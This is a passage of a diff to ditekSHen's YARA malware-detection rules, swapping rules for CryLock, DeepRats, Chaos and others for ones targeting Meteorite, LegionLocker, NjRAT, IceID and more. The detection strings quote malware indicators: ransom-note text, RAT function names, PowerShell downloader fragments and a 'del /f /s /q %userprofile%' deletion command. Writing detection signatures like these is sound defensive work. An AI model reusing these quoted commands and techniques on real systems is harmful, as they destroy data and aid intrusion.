$p3 = "/Go/src/kitty/kidata/" ascii condition: - uint16(0)==0x5a4d and (7 of ($s*) or (3 of ($en*) and 4 of ($s*)) or (5 of ($s*) and 1 of ($en*)) or 5 of ($v1*) or (4 of ($v1*) and 2 of ($s*) and 2 of ($en*))) + uint16(0)==0x5a4d and (3 of ($s*) or 2 of ($m*) or (1 of ($m*) and 1 of ($s*)) or ( all of ($p*) and (1 of ($s*) or 1 of ($m*)))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Crylock : FILE +rule DITEKSHEN_MALWARE_Win_Meteorite : FILE { meta: - description = "Detects CryLock ransomware" + description = "Detects Meteorite downloader" author = "ditekSHen" - id = "296288d8-2fdd-592a-aef9-7d4853885594" - date = "2024-09-06" - modified = "2024-09-06" + id = "ce7a72ce-56a8-5def-a952-f0b08efe8a4a" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L7151-L7186" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "dde35dd2c7e89212c4562f2dcf6a78d06fbb3d31150d49e6c48f758b07f1834f" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L5093-L5109" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "0ae8183d949046be4257b48571a266f2501d60dd302f511ca1a2d518884e6a7f" score = 75 - quality = 73 + quality = 75 tags = "FILE" strings: - $s1 = "Encrypted by BlackRabbit. (BR-" ascii - $s2 = "{ENCRYPTENDED}" ascii - $s3 = "{ENCRYPTSTART}" ascii - $s4 = "<%UNDECRYPT_DATETIME%>" ascii - $s5 = "<%RESERVE_CONTACT%>" ascii - $s6 = "how_to_decrypt.hta" ascii wide - $s7 = "END ENCRYPT ONLY EXTENATIONS" ascii - $s8 = "END UNENCRYPT EXTENATIONS" ascii - $s9 = "END COMMANDS LIST" ascii - $s10 = "END PROCESSES KILL LIST" ascii - $s11 = "END SERVICES STOP LIST" ascii - $s12 = "END PROCESSES WHITE LIST" ascii - $s13 = "END UNENCRYPT FILES LIST" ascii - $s14 = "END UNENCRYPT FOLDERS LIST" ascii - $s15 = "Encrypted files:" ascii - $s16 = { 65 78 74 65 6e 61 74 69 6f 6e 73 00 ff ff ff ff - 06 00 00 00 63 6f 6e 66 69 67 00 00 ff ff ff ff - (0a|0d 0a) 00 00 00 63 6f 6e 66 69 67 2e 74 78 - 74 00 00 ff ff ff ff 03 00 00 00 68 74 61 } - $p1 = "-exclude" fullword - $p2 = "-makeff" fullword - $p3 = "-full" fullword - $p4 = "-nolocal" fullword - $p5 = "-nolan" fullword - $p6 = "\" -id \"" fullword - $p7 = "\" -wid \"" fullword - $p8 = "\"runas\"" fullword - $p9 = " -f -s -t 00" fullword ascii + $x1 = "MeteoriteDownloader" fullword ascii wide + $x2 = "Meteorite Downloader" fullword ascii wide + $x3 = "Meteorite Downloader v" wide + $s1 = "regwrite" fullword wide + $s2 = "urlmon" fullword ascii + $s3 = "wscript.shell" fullword wide + $s4 = "modMain" fullword ascii + $s5 = "VBA6.DLL" fullword ascii + $s6 = "^_http" ascii condition: - uint16(0)==0x5a4d and (3 of ($s*) or 6 of ($p*)) + uint16(0)==0x5a4d and (1 of ($x*) or (5 of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Deeprats : FILE +rule DITEKSHEN_MALWARE_Win_Legionlocker : FILE { meta: - description = "Detects DeepRats (" + description = "Detects LegionLocker ransomware" author = "ditekSHen" - id = "5b774e24-3864-519f-9cfd-d729d7d567a0" - date = "2024-09-06" - modified = "2024-09-06" + id = "4e5c50d0-808e-5adb-bce9-804ddf66ca61" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L7188-L7218" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "511264c0b6932f90069a5206cd142ca7210b0bc40c51ef5aa9c41a161fb57aab" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L5111-L5129" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "2da897b5603415f14fff134b3a94d77e6963da79e117d26ba16e6b04e45f4045" score = 75 - quality = 73 + quality = 75 tags = "FILE" - hash1 = "1f8b7e1b14869d119c5de1f05330094899bd997fca4c322d852db85cbd9271e6" strings: - $s1 = "https://freegeoip.live/json/https://myexternalip.com/rawin" ascii - $s2 = "github.com/cretz/bine" ascii - $s3 = "github.com/kbinani/screenshot" ascii - $s4 = "socks5://%s:%d" ascii - $s5 = "socks5://%s:%s@%s:%d" ascii - $s6 = "http://%s:%d" ascii - $s7 = "http://%s@%s:%d" ascii - $s8 = "%SystemRoot%\\system32\\--CookieAuthentication" ascii - $s9 = "tor_addr_" ascii - $f1 = ".GetVnc" ascii - $f2 = ".GetCommand" ascii - $f3 = ".GetPayload" ascii - $f4 = ".ListenCommands" ascii - $f5 = ".ReceiveFile" ascii - $f6 = ".RegisterImplant" ascii - $f7 = ".Screenshot" ascii - $f8 = ".SendFile" ascii - $f9 = ".StartShell" ascii - $f10 = ".UnregisterImplant" ascii - $f11 = ".VncInstalled" ascii - $f12 = ".PingPong" ascii - $f13 = ".ListenCMD" ascii + $m1 = "+Do not run task manager, powershell, cmd etc." ascii wide + $m2 = "3 hours your files will be deleted." ascii wide + $m3 = "files have been encrypted by Legion Locker" ascii wide + $s1 = "passwordBytes" fullword ascii + $s2 = "_start_enc_" ascii + $s3 = "_del_desktop_" ascii + $s4 = "Processhacker" wide + $s5 = "/k color 47 && del /f /s /q %userprofile%\\" wide + $s6 = "Submit code" fullword wide + $pdb1 = "\\obj\\Debug\\LegionLocker.pdb" ascii + $pdb2 = "\\obj\\Release\\LegionLocker.pdb" ascii condition: - uint16(0)==0x5a4d and (7 of ($s*) or 8 of ($f*)) + uint16(0)==0x5a4d and (1 of ($m*) or 1 of ($pdb*) or 4 of ($s*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Gasket : FILE +rule DITEKSHEN_MALWARE_Win_Dlagentgo : FILE { meta: - description = "Detects Gasket" + description = "Detects Go-based downloader" author = "ditekSHen" - id = "3afa131d-9c88-50df-a3b4-552db4a84e69" - date = "2024-09-06" - modified = "2024-09-06" + id = "e16ccb89-2eb6-5457-a88e-f802f3c35764" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L7220-L7250" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "0279979915891fc8c813ba555120ee5705b53b234a808b5ca77bff35a082e376" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L5131-L5144" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "b9dd2446eddff18be00feb34d8911600feb395a9ce2566786d42b48b444230d0" score = 75 - quality = 73 + quality = 75 tags = "FILE" strings: - $s1 = "main.checkGasket" ascii - $s2 = "main.connectGasket" ascii - $s3 = "/cert/trust/dev/stderr/dev/stdout/index.html" ascii - $f1 = ".SetPingHandler." ascii - $f2 = ".SetPongHandler." ascii - $f3 = ".computeMergeInfo." ascii - $f4 = ".computeDiscardInfo." ascii - $f5 = ".readPlatformMachineID." ascii - $f6 = ".(*Session).establishStream." ascii - $f7 = ".(*Session).handleGoAway." ascii - $f8 = ".(*Stream).processFlags." ascii - $f9 = ".(*Session).handlePing." ascii - $f10 = ".(*windowsService).Install." ascii - $f11 = ".(*windowsService).Uninstall." ascii - $f12 = ".(*windowsService).Status." ascii - $f13 = ".getStopTimeout." ascii - $f14 = ".DialContext." ascii - $f15 = ".WriteControl." ascii - $f16 = ".(*Server).authenticate." ascii - $f17 = ".(*Server).ServeConn." ascii - $f18 = ".(*TCPProxy).listen." ascii - $f19 = ".UserPassAuthenticator.Authenticate." ascii - $f20 = ".(*InfoPacket).XXX_" ascii + $s1 = "main.downloadFile" fullword ascii + $s2 = "main.fetchFiles" fullword ascii + $s3 = "main.createDefenderAllowanceException" fullword ascii + $s4 = "main.unzip" fullword ascii + $s5 = "HideWindow" fullword ascii + $s6 = "/go/src/installwrap/main.go" ascii condition: - uint16(0)==0x5a4d and ( all of ($s*) or 16 of ($f*)) + uint16(0)==0x5a4d and 4 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Silentmoon : FILE +rule DITEKSHEN_MALWARE_Win_Blackmoon : FILE { meta: - description = "Detects SilentMoon" + description = "Detects executables using BlackMoon RunTime" author = "ditekSHen" - id = "0b41a07b-0e2a-5bbf-8789-3b46460d2c09" - date = "2024-09-06" - modified = "2024-09-06" + id = "76071d36-3d2d-589c-8c3f-0ae60e69996e" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L7252-L7272" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "1aa61e83d0003ef41d16fd40698485fdf41a957639ac3c3f2770994a43bd502a" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L5146-L5155" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "05bfde8ec3a469df5707c195e25995ac6af730e8a1595b1a598276c024420be2" score = 75 - quality = 25 + quality = 75 tags = "FILE" strings: - $s1 = "\\\\.\\Global\\PIPE\\" fullword wide - $s2 = "REMOTE_NS:ERROR:%d" fullword ascii - $s3 = "REMOTE:ERROR:%d" fullword ascii - $s4 = "COMNAP,COMNODE,SQLQUERY,SPOOLSS,LLSRPC,browser" fullword wide - $s5 = "Mem alloc err" fullword ascii - $s6 = "block %d: crc = 0x%08x, combined CRC = 0x%08x, size = %d" ascii - $x1 = "ACTION:UNSUPPORTED" fullword ascii - $x2 = "?ServiceMain@@YAXKPAPA_W@Z" fullword ascii - $x3 = "?ServiceCtrlHandler@@YGKKKPAX0@Z" fullword ascii - $x4 = "%d socks, %d sorted, %d scanned" ascii - $x5 = "GoldenSky" fullword wide - $x6 = "SilentMoon" fullword wide - $x7 = "internalstoragerpc" fullword wide + $s1 = "blackmoon" fullword ascii + $s2 = "BlackMoon RunTime Error:" fullword ascii condition: - uint16(0)==0x5a4d and ( all of ($s*) or 3 of ($x*)) + uint16(0)==0x5a4d and all of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Lu0Bot : FILE +rule DITEKSHEN_MALWARE_Win_Iceid : FILE { meta: - description = "Detects Lu0Bot" + description = "Detects IceID / Bokbot variants" author = "ditekSHen" - id = "f8595553-b911-5e30-9ece-cad7d5913f19" - date = "2024-09-06" - modified = "2024-09-06" + id = "0da94737-0f82-5892-a0eb-f9f3c0a114cc" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L7274-L7285" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "b4822248230a804b1dc75f8d517af28a621dab1746c9ef45eaa4754149ce0cba" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L5157-L5176" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "204b4c297806a36ca14bb3e659824f4eb49b18308af7090f0db1194705f1e2c9" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "WinExec" fullword ascii - $s2 = "AlignRects" fullword ascii - $o1 = { be 00 20 40 00 89 f7 89 f0 81 c7 a? 01 00 00 81 } - $o2 = { 53 50 e8 b0 01 00 00 e9 99 01 00 00 e8 ae 01 00 } + $n1 = "POST" fullword wide + $n2 = "; _gat=" fullword wide + $n3 = "; _ga=" fullword wide + $n4 = "; _u=" fullword wide + $n5 = "; __io=" fullword wide + $n6 = "; _gid=" fullword wide + $n7 = "Cookie: __gads=" fullword wide + $s1 = "c:\\ProgramData" ascii + $s2 = "loader_dll_64.dll" fullword ascii + $s3 = "loader_dll_32.dll" fullword ascii + $s4 = "/?id=%0.2X%0.8X%0.8X%s" ascii + $s5 = "%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.8X" ascii condition: - uint16(0)==0x5a4d and filesize <4KB and 1 of ($s*) and all of ($o*) + uint16(0)==0x5a4d and (( all of ($n*) and 1 of ($s*)) or (3 of ($s*) and 1 of ($n*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Shellcodedlei : FILE +rule DITEKSHEN_MALWARE_Win_Purge : FILE { meta: - description = "Detects shellcode downloader, executer, injector" + description = "Detects Purge ransomware" author = "ditekSHen" - id = "62a4f141-87f8-596a-adf6-5bf9a50c9e91" - date = "2024-09-06" - modified = "2024-09-06" + id = "b3fb9f38-ce12-5e0e-8908-3379b5da3497" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L7287-L7304" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "064c17427ae6b33ffb09a14abcb924d20ead44250e8bd03070bf40869f1c812e" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L5178-L5201" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "83d13eca69bc99539e47d6d29689edf2a4fcd2260c6e909582126a490eef8115" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "PPidSpoof" fullword ascii - $s2 = "ProcHollowing" fullword ascii - $s3 = "CreateProcess" fullword ascii - $s4 = "DynamicCodeInject" fullword ascii - $s5 = "PPIDDynCodeInject" fullword ascii - $s6 = "MapAndStart" fullword ascii - $s7 = "PPIDAPCInject" fullword ascii - $s8 = "PPIDDLLInject" fullword ascii - $s9 = "CopyShellcode" fullword ascii - $s10 = "GetEntryFromBuffer" fullword ascii + $n1 = "imagesave/imagesize.php" ascii + $n2 = "imageinfo.html" ascii + $n3 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" ascii + $n4 = "Content-Type: application/x-www-form-urlencoded" ascii + $m1 = "YOUR_ID: %x%x" wide + $m2 = "Specially for your PC was generated personal" wide + $m3 = "which is on our Secret Server" wide + $m4 = "wait for a miracle and get your price" wide + $s1 = "%s\\SpyHunter Remove Ransomware" wide + $s2 = "$recycle.bin" fullword wide + $s3 = "TheEnd" fullword wide + $s4 = "%s\\HELP_DECRYPT_YOUR_FILES.TXT" fullword wide + $s5 = "%s.id_%x%x_email_" wide + $s6 = "scmd" fullword wide + $s7 = "process call create \"%s\"" wide + $s8 = "FinishEnds" fullword ascii condition: - uint16(0)==0x5a4d and filesize <100KB and 5 of ($s*) + uint16(0)==0x5a4d and ( all of ($s*) or all of ($n*) or 2 of ($m*) or (3 of ($s*) and (1 of ($n*) or 1 of ($m*)))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Bluebot : FILE +rule DITEKSHEN_MALWARE_Win_Njrat : FILE { meta: - description = "Detects BlueBot" + description = "Detects NjRAT / Bladabindi / NjRAT Golden" author = "ditekSHen" - id = "cddd40bb-c3c6-5c44-9cb1-480571375be8" - date = "2024-09-06" - modified = "2024-09-06" + id = "078dea64-8f95-5939-a1fb-c0a888adcf0d" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L7306-L7333" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "04a19f649eb2fff7a5bc59ccead80cd0a04c4e5418cbc83e850045dba75b03e0" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L5203-L5220" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "92d535a7c7f361b7a0901d0b99427ebc82a69577bfea73c04a7f9d51d2054b36" score = 75 quality = 75 tags = "FILE" strings: - $x1 = "Blue_Botnet" wide - $x2 = "5-START-http" ascii - $x3 = "*300-END-" ascii - $x4 = "botlogger.php" wide - $s1 = "//TARGET//" wide - $s2 = "//BLOG//" wide - $s3 = "MCBOTALPHA" wide - $s4 = "//IPLIST//" wide - $s5 = "Host: //BLOG//" wide - $s6 = "User-Agent: //USERAGENT//" wide - $s7 = "<string>//TARGET//</string>" wide - $s8 = "POST //URL// HTTP/1.1/r/n" wide - $v1 = "<attack>b__" ascii - $v2 = "PressData" fullword ascii - $v3 = "POSTPiece" fullword ascii - $v4 = /(load|tcp|udp)Stuff/ fullword ascii - $v5 = "isAttacking" fullword ascii - $v6 = "DoSAttack" fullword ascii - $v7 = "prv_attack" fullword ascii - $v8 = "blogList" fullword ascii + $x1 = /Njrat\s\d+\.\d+\sGolden\s/ wide + $s1 = /\sfirewall\s(add|delete)\sallowedprogram/ wide + $s2 = { 63 00 6d 00 64 00 2e 00 65 00 78 00 65 00 20 00 2f 00 (63|6b) 00 20 00 70 00 69 00 6e 00 67 } + $s3 = "Execute ERROR" wide + $s4 = "Download ERROR" wide + $s5 = "[kl]" fullword wide + $s6 = "UploadValues" fullword wide + $s7 = "winmgmts:\\\\.\\root\\SecurityCenter2" fullword wide + $s8 = "HideM" fullword wide + $s9 = "No Antivirus" fullword wide condition: - uint16(0)==0x5a4d and (2 of ($x*) or 5 of ($s*) or 5 of ($v*) or 9 of them ) + uint16(0)==0x5a4d and 4 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Unkcobaltstrike : FILE +rule DITEKSHEN_MALWARE_Win_Darktrackrat : FILE { meta: - description = "Detects unknown malware, potentially CobaltStrike related" + description = "Detects OzoneRAT / DarkTrack / DarkSky" author = "ditekSHen" - id = "24ddccc7-3700-57a1-999c-ddefae6911bb" - date = "2024-09-06" - modified = "2024-09-06" + id = "ef8675f8-f643-5948-a967-e4a9ce5ab89e" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L7335-L7354" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "2fb4e87eec3b56773b812ce6a5c28143183087e0f93d92d76c1103563f8e0891" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L5222-L5245" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "2a831c0f7707864d8c9e9fa338085a52933869d8cfbdbe0d12715da301c12646" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "https://%hu.%hu.%hu.%hu:%u" ascii wide - $s2 = "https://microsoft.com/telemetry/update.exe" ascii wide - $s3 = "\\System32\\rundll32.exe" ascii wide - $s4 = "api.opennicproject.org" ascii wide - $s5 = "%s %s,%s %u" ascii wide - $s6 = "User32.d?" ascii wide - $s7 = "StrDupA" fullword ascii wide - $s8 = "{6d4feed8-18fd-43eb-b5c4-696ad06fac1e}" ascii wide - $s9 = "{ac41592a-3d21-46b7-8f21-24de30531656}" ascii wide - $s10 = "bd526:3b.4e32.57c8.9g32.35ef41642767~" ascii wide - $s11 = { 4b d3 91 49 a1 80 91 42 83 b6 33 28 36 6b 90 97 } - $s12 = { 0d 4c e3 5c c9 0d 1f 4c 89 7c da a1 b7 8c ee 7c } + $x1 = "Klog.dat" ascii + $x2 = "I_AM_DT" ascii + $x3 = " Alien" ascii + $x4 = "Local Victim" ascii + $x5 = "Dtback\\AlienEdition\\Server\\SuperObject.pas" ascii + $x6 = "].encryptedUsername" ascii + $x7 = "].encryptedPassword" ascii + $x8 = { 49 41 4d [6] 44 41 52 [0-2] 4b [6] 44 54 41 43 4b } + $s1 = "AntiVirusProduct" ascii + $s2 = "AntiSpywareProduct" ascii + $s3 = "ConnectServer" ascii + $s4 = "ExecQuery" ascii + $s5 = "\\Drivers\\Etc\\Hosts" fullword ascii + $s6 = "BTMemoryLoadLibary: Get DLLEntyPoint" ascii + $s7 = "\\\\.\\SyserDbgMsg" fullword ascii + $s8 = "\\\\.\\SyserBoot" fullword ascii condition: - uint16(0)==0x5a4d and 6 of them + uint16(0)==0x5a4d and (4 of ($x*) or 6 of ($s*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_EXEPWSHDL : FILE +rule DITEKSHEN_MALWARE_Win_Godzilla : FILE { meta: - description = "Detects executable downloaders using PowerShell" + description = "Detects Godzilla loader" author = "ditekSHen" - id = "1e5a414b-e81e-5915-b00b-75edbfcc32d2" - date = "2024-09-06" - modified = "2024-09-06" + id = "3384b844-6abf-5f94-a62b-7ebbdfe321bd" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L7356-L7374" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "58fbd27758ecd435eb30b7c34f4cf142db8e31edee0838175992923a51706508" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L5247-L5265" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "ff87fbaaf488ac69e06a03a7f8e5305ec114caa6271c25fa130033f50f0d9095" score = 75 - quality = 50 + quality = 75 tags = "FILE" strings: - $x1 = "[Ref].Assembly.GetType(" ascii wide - $x2 = ".SetValue($null,$true)" ascii wide - $s1 = "replace" ascii wide - $s2 = "=@(" ascii wide - $s3 = "[System.Text.Encoding]::" ascii wide - $s4 = ".substring" ascii wide - $s5 = "FromBase64String" ascii wide - $d1 = "New-Object" ascii wide - $d2 = "Microsoft.XMLHTTP" ascii wide - $d3 = ".open(" ascii wide - $d4 = ".send(" ascii wide + $x1 = "MSVBVM60.DLL" fullword ascii + $x2 = "Loginserver8" fullword ascii + $x3 = "Proflogger7" fullword ascii + $s1 = "Badgeless5" fullword ascii + $s2 = "Montebrasite3" fullword ascii + $s3 = "Atelomyelia4" fullword ascii + $s4 = "Xxencoded5" fullword ascii + $s5 = "Garneau2" fullword ascii + $s6 = "Hypostasis0" fullword ascii + $s7 = "Piarhemia4" fullword ascii + $s8 = "Foredestine8" fullword ascii condition: - uint16(0)==0x5a4d and filesize <100KB and all of ($x*) and (3 of ($s*) or all of ($d*)) + uint16(0)==0x5a4d and all of ($x*) and 2 of ($s*) } import "pe" -rule DITEKSHEN_MALWARE_Win_MB150 : FILE +rule DITEKSHEN_MALWARE_Win_UNK03 : FILE { meta: - description = "Detects MB150? Go ransomware" + description = "Detects unknown malware" author = "ditekSHen" - id = "9688974b-ccf9-59ea-bb31-e46c63f021bf" - date = "2024-09-06" - modified = "2024-09-06" + id = "b0711427-b6bf-5e4b-af36-9c752ead4d6c" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L7376-L7402" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "a07535fc53912ddde6a0bed187c21ecdb2701d317d7de0cbdd2db37071bc9a21" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L5267-L5280" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "f1a4be68206628c3addbce8b6bbc1f801e67632d4e6a6af1d45cdad833e9a991" score = 75 quality = 75 tags = "FILE" strings: - $x1 = /main\.evade_(clicks_count|cpu_count|disk_size|foreground_window|hostname|mac|printer|screen_size|system_memory|time_acceleration|tmp|utc)/ fullword ascii - $x2 = /main\.sandbox_(hostname|mac_addresses)/ fullword ascii - $x3 = "main.drop_ransom_note" fullword ascii - $x4 = "main.ransom_amount" fullword ascii - $x5 = "main.create_encryption_key" fullword ascii - $x6 = "main.encrypt" fullword ascii - $x7 = "main.encrypt_encryption_key" fullword ascii - $x8 = "main.encrypt_file" fullword ascii - $x9 = "main.ext_blacklist" fullword ascii - $mac1 = "00:03:FF00:05:6900:0C:2900:16:3E00:1C:1400:1C:4200:50:56" ascii nocase - $mac2 = "00-03-FF00-05-6900-0C-2900-16-3E00-1C-1400-1C-4200-50-56" ascii nocase - $mac3 = "0003FF000569000C2900163E001C14001C42005056" ascii nocase - $go = "Go build ID:" ascii - $s1 = "main.MB150" ascii - $s2 = "http://1.1.1.1" ascii - $s3 = "your personnal ID" ascii - $s4 = "ransom amount" ascii - $s5 = "binance.com" ascii - $s6 = "getmonero.org" ascii + $s1 = "Software\\Microsoft\\Windows\\CurrentVersion" ascii + $s2 = "rundll32.exe C:\\Windows\\System32\\shimgvw.dll,ImageView_Fullscreen %s" ascii + $s3 = "%s.jpg" ascii + $s4 = "%s\\sz.txt" ascii + $s5 = "ChromeSecsv9867%d7.exe" ascii + $s6 = "%s\\appl%c.jpg" ascii condition: - uint16(0)==0x5a4d and (4 of ($x*) or ($go and 4 of ($s*)) or (1 of ($mac*) and (2 of ($x*) or 3 of ($s*)))) + uint16(0)==0x5a4d and all of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Chaos : FILE +rule DITEKSHEN_MALWARE_Win_UNK04 : FILE { meta: - description = "Detects Chaos ransomware" + description = "Detects unknown malware (proxy tool)" author = "ditekSHen" - id = "59d43cfb-72d8-5c17-87bf-f1f364d23bed" - date = "2024-09-06" - modified = "2024-09-06" + id = "6a178f37-a9fd-5a83-a550-c6333342ac9b" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L7404-L7433" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "6203ab09745db817b9e909d70cf1d5be9769c414461ee5f7bb344b6959986537" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L5282-L5296" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "ba6e5bbc1d094b23e3870af963503d1ccbcd56adc24126b4a38b77d4b88b4b67" score = 75 - quality = 44 + quality = 75 tags = "FILE" strings: - $s1 = "<EncyptedKey>" fullword wide - $s2 = "<EncryptedKey>" fullword wide - $s3 = "C:\\Users\\" fullword wide - $s4 = "read_it.txt" fullword wide - $s5 = "#base64Image" fullword wide - $s6 = "(?:[13]{1}[a-km-zA-HJ-NP-Z1-9]{26,33}|bc1[a-z0-9]{39,59})" fullword wide - $s7 = /check(Spread|Sleep|AdminPrivilage|deleteShadowCopies|disableRecoveryMode|deleteBackupCatalog)/ fullword ascii nocase - $s8 = /(delete|disable)(ShadowCopies|RecoveryMode|BackupCatalog)/ fullword ascii nocase - $s9 = "spreadName" fullword ascii - $s10 = "processName" fullword ascii - $s11 = "sleepOutOfTempFolder" fullword ascii - $s12 = "AlreadyRunning" fullword ascii - $s13 = "random_bytes" fullword ascii - $s14 = "encryptDirectory" fullword ascii nocase - $s15 = "EncryptFile" fullword ascii nocase - $s16 = "intpreclp" fullword ascii - $s17 = "bytesToBeEncrypted" fullword ascii - $s18 = "textToEncrypt" fullword ascii - $m1 = "Chaos is" wide - $m2 = "Payment informationAmount:" wide - $m3 = "Coinmama - hxxps://www.coinmama.com Bitpanda - hxxps://www.bitpanda.com" wide - $m4 = "where do I get Bitcoin" wide + $x1 = "127.0.0.1/%d" fullword ascii + $x2 = "SYSTEM\\CurrentControlSet\\SERVICES\\PORTPROXY\\V4TOV4\\TCP" fullword ascii + $x3 = "%s rundll32.exe" fullword ascii + $s1 = "kxetray.exe" fullword ascii + $s2 = "ksafe.exe" fullword ascii + $s3 = "Mcshield.exe" fullword ascii + $s4 = "Miner.exe" fullword ascii condition: - uint16(0)==0x5a4d and 6 of 